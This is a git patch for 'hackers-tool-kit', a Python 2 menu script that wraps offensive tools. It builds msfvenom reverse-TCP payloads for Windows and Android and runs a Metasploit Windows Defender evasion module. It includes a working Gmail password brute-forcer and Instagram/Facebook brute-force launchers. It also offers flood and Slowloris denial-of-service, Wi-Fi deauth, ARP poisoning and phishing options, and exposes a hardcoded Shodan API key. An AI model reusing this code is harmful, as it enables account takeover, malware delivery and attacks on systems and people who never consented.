hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - found = True -mainbanner() -main() From 1c9635326b93f970ff0bba8835fd54590cc09dc5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 24 Mar 2019 15:52:26 -0400 Subject: [PATCH 062/214] Add files via upload --- htk.py | 2079 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2079 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..517f493 --- /dev/null +++ b/htk.py @@ -0,0 +1,2079 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arppois : ARP poisoning | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = 